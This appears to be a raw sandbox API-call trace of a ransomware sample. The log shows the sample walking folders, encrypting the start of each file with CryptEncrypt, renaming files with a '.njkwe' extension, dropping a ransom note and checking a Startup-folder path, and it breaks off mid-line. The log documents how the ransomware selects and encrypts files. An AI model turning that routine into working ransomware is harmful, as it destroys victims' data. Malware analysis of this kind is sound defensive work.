[0061.743] lstrcmpiW (lpString1="1053", lpString2="$Recycle.bin") returned 1 [0061.743] lstrcmpiW (lpString1="1053", lpString2="System Volume Information") returned -1 [0061.743] lstrcmpiW (lpString1="1053", lpString2="Program Files") returned -1 [0061.743] lstrcmpiW (lpString1="1053", lpString2="Program Files (x86)") returned -1 [0061.743] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053") returned 30 [0061.743] lstrcmpW (lpString1="1053", lpString2=".") returned 1 [0061.743] lstrcmpW (lpString1="1053", lpString2="..") returned 1 [0061.743] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1053", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.743] GetProcessHeap () returned 0xbe0000 [0061.743] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.743] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\*") returned 32 [0061.743] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e60 [0061.744] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.744] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.744] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.744] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.744] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.744] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\.") returned 32 [0061.744] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.744] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.744] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.744] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.744] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.744] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.744] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.744] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\..") returned 33 [0061.744] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.744] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.744] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.744] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.744] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.744] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.744] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.744] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.744] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 39 [0061.744] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.745] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.745] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.745] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.745] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.745] GetTickCount () returned 0x114fdca [0061.745] GetTickCount () returned 0x114fdca [0061.745] GetTickCount () returned 0x114fdca [0061.745] GetTickCount () returned 0x114fdca [0061.745] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.745] GetProcessHeap () returned 0xbe0000 [0061.745] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.745] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xf19, lpOverlapped=0x0) returned 1 [0061.746] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff0e7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.746] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xf19, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xf19, lpOverlapped=0x0) returned 1 [0061.747] GetProcessHeap () returned 0xbe0000 [0061.747] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.747] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.747] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.747] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.747] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.747] CloseHandle (hObject=0x42c) returned 1 [0061.748] GetProcessHeap () returned 0xbe0000 [0061.748] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.748] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.750] GetProcessHeap () returned 0xbe0000 [0061.750] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.750] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.750] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.750] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.750] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.750] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.750] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.750] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned 48 [0061.750] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.750] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.750] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.750] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.750] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.751] GetTickCount () returned 0x114fdca [0061.751] GetTickCount () returned 0x114fdca [0061.751] GetTickCount () returned 0x114fdca [0061.751] GetTickCount () returned 0x114fdca [0061.751] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.751] GetProcessHeap () returned 0xbe0000 [0061.751] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.751] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.753] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.753] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.753] GetProcessHeap () returned 0xbe0000 [0061.753] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.753] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.754] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.754] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.754] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.754] CloseHandle (hObject=0x42c) returned 1 [0061.756] GetProcessHeap () returned 0xbe0000 [0061.756] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.756] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.757] GetProcessHeap () returned 0xbe0000 [0061.757] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.757] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.757] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.757] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.757] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.758] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.758] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.758] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 49 [0061.758] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.758] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.758] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.758] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.758] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.758] GetTickCount () returned 0x114fdd9 [0061.758] GetTickCount () returned 0x114fdd9 [0061.758] GetTickCount () returned 0x114fdd9 [0061.758] GetTickCount () returned 0x114fdd9 [0061.758] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.758] GetProcessHeap () returned 0xbe0000 [0061.758] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.758] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.760] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.760] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.760] GetProcessHeap () returned 0xbe0000 [0061.760] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.760] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.760] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.760] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.760] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.760] CloseHandle (hObject=0x42c) returned 1 [0061.762] GetProcessHeap () returned 0xbe0000 [0061.762] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.762] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.762] GetProcessHeap () returned 0xbe0000 [0061.762] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.762] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.762] FindClose (in: hFindFile=0xc19e60 | out: hFindFile=0xc19e60) returned 1 [0061.762] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1053\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.762] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1053\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.763] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.763] CloseHandle (hObject=0x428) returned 1 [0061.764] GetProcessHeap () returned 0xbe0000 [0061.764] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.764] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1055", cAlternateFileName="")) returned 1 [0061.764] lstrcmpiW (lpString1="1055", lpString2="Windows") returned -1 [0061.764] lstrcmpiW (lpString1="1055", lpString2="$Recycle.bin") returned 1 [0061.764] lstrcmpiW (lpString1="1055", lpString2="System Volume Information") returned -1 [0061.764] lstrcmpiW (lpString1="1055", lpString2="Program Files") returned -1 [0061.764] lstrcmpiW (lpString1="1055", lpString2="Program Files (x86)") returned -1 [0061.764] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055") returned 30 [0061.764] lstrcmpW (lpString1="1055", lpString2=".") returned 1 [0061.764] lstrcmpW (lpString1="1055", lpString2="..") returned 1 [0061.764] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1055", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.764] GetProcessHeap () returned 0xbe0000 [0061.764] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.764] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\*") returned 32 [0061.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0061.764] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.764] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.764] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.764] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.764] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.764] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\.") returned 32 [0061.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.764] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.765] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.765] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.765] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.765] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.765] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.765] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\..") returned 33 [0061.765] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.765] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.765] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.765] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.765] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.765] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.765] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.765] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.765] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 39 [0061.765] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.765] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.765] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.765] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf", 